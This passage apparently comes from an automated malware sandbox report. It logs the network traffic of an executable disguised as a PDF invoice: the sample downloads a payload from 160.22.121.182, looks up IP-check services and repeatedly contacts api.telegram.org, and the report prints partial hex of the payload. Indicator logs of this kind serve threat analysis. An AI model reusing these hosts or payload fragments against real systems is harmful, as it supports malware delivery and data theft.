                                                                                    Jan 13, 2025 11:46:50.701709986 CET44350037149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.160896063 CET44350037149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.161081076 CET44350037149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.161158085 CET50037443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.161477089 CET50037443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.164036036 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.164109945 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.164217949 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.164448977 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.164479017 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.817547083 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.819113016 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.819153070 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:51.819287062 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:51.819348097 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.173974991 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.174149990 CET44350038149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.174227953 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.174575090 CET50038443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.177110910 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.177206993 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.177309990 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.177542925 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.177577972 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.813402891 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.816591978 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.816646099 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:52.816751003 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:52.816765070 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.219628096 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.219799042 CET44350039149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.219901085 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.236540079 CET50039443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.240751982 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.240794897 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.240868092 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.241327047 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.241353035 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.906272888 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.907795906 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.907809019 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:53.907871008 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:53.907882929 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.196193933 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.196377039 CET44350040149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.196479082 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.197017908 CET50040443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.199462891 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.199503899 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.199580908 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.199831963 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.199847937 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.823717117 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.825283051 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.825305939 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:54.827110052 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:54.827116966 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.187789917 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.187897921 CET44350041149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.187978029 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.188714981 CET50041443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.191495895 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.191530943 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.194875002 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.195153952 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.195167065 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.835203886 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.839261055 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.839276075 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:55.839818954 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:55.839823008 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.193531990 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.193759918 CET44350042149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.193829060 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.194864035 CET50042443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.196482897 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.196522951 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.196666956 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.196943045 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.196959972 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.817439079 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.819004059 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.819022894 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:56.819077015 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:56.819087982 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.252193928 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.252290010 CET44350043149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.252341032 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.252969980 CET50043443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.255816936 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.255839109 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.255906105 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.256211996 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.256223917 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.881944895 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.883641958 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.883660078 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:57.883723974 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:57.883729935 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.246926069 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.247544050 CET44350044149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.247629881 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.248121023 CET50044443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.250581026 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.250633001 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.250881910 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.251127958 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.251142025 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.889203072 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.904119968 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.904141903 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:58.904208899 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:58.904215097 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:59.339226007 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:59.339461088 CET44350045149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:59.339524031 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:59.339808941 CET50045443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:59.343712091 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:59.343734026 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:59.343841076 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:59.344329119 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:59.344341040 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:59.998176098 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:46:59.999979973 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:46:59.999996901 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:00.000068903 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:00.000077009 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:00.494189024 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:00.494430065 CET44350046149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:00.494492054 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:00.494884014 CET50046443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:00.497848034 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:00.497889042 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:00.498054028 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:00.498321056 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:00.498336077 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.131699085 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.133213997 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.133249044 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.133403063 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.133408070 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.510237932 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.510457039 CET44350047149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.510514021 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.515831947 CET50047443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.553674936 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.553716898 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:01.553783894 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.558046103 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:01.558060884 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.207818985 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.211425066 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.211436033 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.211482048 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.211488008 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.585159063 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.585360050 CET44350048149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.585498095 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.587440014 CET50048443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.588140011 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.588166952 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:02.588435888 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.588732004 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:02.588743925 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.201797009 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.203828096 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.203845024 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.204030991 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.204036951 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.648716927 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.648948908 CET44350049149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.649019957 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.649336100 CET50049443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.652514935 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.652551889 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:03.652622938 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.652908087 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:03.652923107 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:04.340893030 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:04.386816025 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.048355103 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.048379898 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:05.048453093 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.048460960 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:05.466975927 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:05.467204094 CET44350050149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:05.467272997 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.467547894 CET50050443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.469002962 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.469033957 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:05.469325066 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.469325066 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:05.469350100 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.082199097 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.083724976 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.083746910 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.084022999 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.084032059 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.446619034 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.446850061 CET44350051149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.446913958 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.447164059 CET50051443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.448148012 CET50052443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.448168993 CET44350052149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:06.448242903 CET50052443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.448426008 CET50052443192.168.2.5149.154.167.220
                                                                                    Jan 13, 2025 11:47:06.448436022 CET44350052149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:07.075493097 CET44350052149.154.167.220192.168.2.5
                                                                                    Jan 13, 2025 11:47:07.121079922 CET50052443192.168.2.5149.154.167.220

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 13, 2025 11:45:16.822251081 CET5776453192.168.2.51.1.1.1
                                                                                    Jan 13, 2025 11:45:16.868707895 CET53577641.1.1.1192.168.2.5
                                                                                    Jan 13, 2025 11:45:31.779221058 CET5857053192.168.2.51.1.1.1
                                                                                    Jan 13, 2025 11:45:31.787419081 CET53585701.1.1.1192.168.2.5
                                                                                    Jan 13, 2025 11:45:58.361114979 CET5842153192.168.2.51.1.1.1
                                                                                    Jan 13, 2025 11:45:58.367770910 CET53584211.1.1.1192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 13, 2025 11:45:16.822251081 CET192.168.2.51.1.1.10x3b9aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.779221058 CET192.168.2.51.1.1.10xa6c1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:58.361114979 CET192.168.2.51.1.1.10x2cfeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 13, 2025 11:45:16.868707895 CET1.1.1.1192.168.2.50x3b9aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:16.868707895 CET1.1.1.1192.168.2.50x3b9aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:16.868707895 CET1.1.1.1192.168.2.50x3b9aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:16.868707895 CET1.1.1.1192.168.2.50x3b9aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:16.868707895 CET1.1.1.1192.168.2.50x3b9aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:16.868707895 CET1.1.1.1192.168.2.50x3b9aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:31.787419081 CET1.1.1.1192.168.2.50xa6c1No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 11:45:58.367770910 CET1.1.1.1192.168.2.50x2cfeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • reallyfreegeoip.org
                                                                                    • api.telegram.org
                                                                                    • 160.22.121.182
                                                                                    • checkip.dyndns.org

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549704160.22.121.182802924C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:44:59.645564079 CET209OUTGET /STATO/Tllgzvbkww.vdf HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                    Host: 160.22.121.182
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:00.609076977 CET1236INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:00 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Mon, 13 Jan 2025 07:17:39 GMT
                                                                                    ETag: "101c08-62b913d51b369"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1055752
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Data Raw: 46 83 40 82 0c 2f 6b 4e f5 01 b6 35 7c 5b b5 f9 13 73 4c 85 dc 12 55 13 6e cf 0d 04 92 6c 48 64 1f 4d 5d a7 22 24 95 16 28 77 93 4b c3 0a 5e 74 a5 fc bb 1e 13 fd d1 ce 45 b4 50 f3 9f cf ec 2b 69 d5 7a ea 8a 92 9d 8c b0 66 a3 59 c8 fc 58 90 63 b9 e0 11 6e d4 83 c7 3e e3 3e a4 bd 97 8b 25 91 03 f8 57 d2 4c 51 8b df 25 31 0d 34 dd 6a 33 8f 44 25 67 1d 30 43 ac c8 d7 80 db c5 a0 3d c0 8b 55 52 d6 f2 be 24 f4 16 0b 08 21 3f 85 86 88 e6 c6 08 07 54 ca 7b 7b e5 22 ea 1d 59 4f c0 cb 54 bc 6e 01 0a 36 dd 4a 38 4e 3d 41 ed 04 9f fa c2 0b 93 f4 b2 0d d8 ae ba 19 fe 98 02 59 37 e4 e9 cb 94 f7 49 bc 0c 8d fc bc d6 5a 84 77 a8 b2 9a 89 0e 50 ef 2f 74 7f a5 43 b7 a4 87 d1 5f a4 25 17 34 68 df 11 0d 9e eb 0e 0f 76 15 9d f8 27 f8 d1 23 eb 51 3e b5 16 38 0c a8 24 36 8a f4 49 9f f4 88 e9 a2 77 51 4a da c9 0e f2 9a c5 36 98 d7 7e 0e cf 07 01 3f 62 12 41 80 b7 cc ed 99 b3 03 34 5a c7 93 0c 98 aa ec f0 9e 22 7d c6 34 f6 f8 f5 1d da e8 6d 88 49 09 2c 1f f1 53 32 cf 12 e6 88 e2 a7 47 08 4a 2f b5 e2 bd 66 7f f9 67 d7 89 97 [TRUNCATED]
                                                                                    Data Ascii: F@/kN5|[sLUnlHdM]"$(wK^tEP+izfYXcn>>%WLQ%14j3D%g0C=UR$!?T{{"YOTn6J8N=AY7IZwP/tC_%4hv'#Q>8$6IwQJ6~?bA4Z"}4mI,S2GJ/fg~OD93w$]$dqb|,xO[_qn5~=g@hb<;d~ltaH@?A<F?8ykg/?zjni-DJ PLdQ~A=n=|-+Ve/!f{R\Ud4l9AWtOR*LCUUIUYhhi/n1^4B/+qo18 iZ{Jk8aOfqan9,<xD[O3s]= y e|EpbZVFz]doX*pf>&E&6*9g}f-4%1-g~>U#SlA#L{mwjY}\}64p?8N9,<:QQt,RqxJd$QEeo>~
                                                                                    Jan 13, 2025 11:45:00.609118938 CET1236INData Raw: d1 0a 29 10 e8 40 4e c8 f1 9e 9b e8 b2 59 7e ea 30 76 81 a3 59 7d b3 43 6e 61 71 7f 15 81 bd f5 07 ea f7 74 a9 ff b2 a7 bf 0d a5 c1 18 1d 99 e1 35 35 85 39 e0 57 73 58 78 0e dd b8 f6 32 1b 9b 1f f1 a4 a8 1b 02 57 21 86 5f c4 08 4e cb 05 e8 af 89
                                                                                    Data Ascii: )@NY~0vY}Cnaqt559WsXx2W!_NO*ReN0,$*<su9f5BkubrmIPJTz=P0R\q~7od)im}V9d&Hl+::c3
                                                                                    Jan 13, 2025 11:45:00.609154940 CET1236INData Raw: aa 03 9e c0 2d f0 ed 49 58 20 a4 bc b3 98 dc c6 97 3a 5e f2 ae f3 12 5d 22 7b b0 8d ca 1c 7f 56 81 a7 e7 a9 08 02 08 57 57 30 93 ec 23 e8 d4 80 f1 b4 12 bb f5 2c 0e 8e 99 5e 5a f8 e6 2a d1 cb ce d7 66 87 c0 09 98 cc d4 aa 3b 25 83 92 db 33 87 52
                                                                                    Data Ascii: -IX :^]"{VWW0#,^Z*f;%3R&J$}R3nmvi-b5uel3u-gLj;? &)w/qlz^b[-HZAFz*dp\0I';.$M*t2<#4
                                                                                    Jan 13, 2025 11:45:00.609189987 CET672INData Raw: fb 66 c0 e1 e1 a6 df c1 b8 70 69 9b 13 c3 55 95 4e 10 c1 9a 96 ef 4c 99 99 28 97 f8 43 1b ed 55 ba 8b 83 fc 02 94 9b 02 c6 98 0a 4e 44 ed 50 78 5e 11 ec 66 cf f1 01 2e 3e d5 09 bf 5a ec 3a 9c 36 e6 e0 9a da 1c e3 73 6d 9f 23 02 d2 99 c1 5c 43 24
                                                                                    Data Ascii: fpiUNL(CUNDPx^f.>Z:6sm#\C$2]#\)S\_G^WA>Cc a$z9@ZwJ4j=*kryxhuQwr3}h`z^3A2/g>s7,|i@4)c
                                                                                    Jan 13, 2025 11:45:00.609222889 CET1236INData Raw: cf b6 04 5d 20 b1 da e3 4d b4 61 d0 b1 41 6c 72 e0 8f 08 d8 7f 29 90 11 6b da 8c 61 08 fb 6a b9 70 f1 a5 fe 34 01 d9 b1 fa cc 5f 69 f8 ad e0 f2 a8 58 32 80 cf 26 52 b6 4e 7f 3e b9 e3 06 9c e1 1b 8b c2 80 1d 5d 3d 7e 55 5d df a7 ec 43 ba 08 0a 11
                                                                                    Data Ascii: ] MaAlr)kajp4_iX2&RN>]=~U]C9^&eAP_v+0%0>8mG^x&[Ara4l!~Oo[[^q".(-j8aV$ph^qQjpDRuPH/FDy
                                                                                    Jan 13, 2025 11:45:00.609256029 CET224INData Raw: e8 62 ec 61 e0 07 49 eb 76 79 d8 93 b7 1c 57 41 1f 43 e2 c7 ce 4c d3 36 d8 63 72 b2 69 3b fe d7 bc e6 11 0e 05 ce 35 d5 07 25 ae 16 cc e2 27 b0 a8 3f 8a b7 dc 92 af e5 e0 10 88 86 68 90 da 1d cd dd b6 46 a1 0a 85 93 09 e6 e1 33 2e eb 1b ee 00 a7
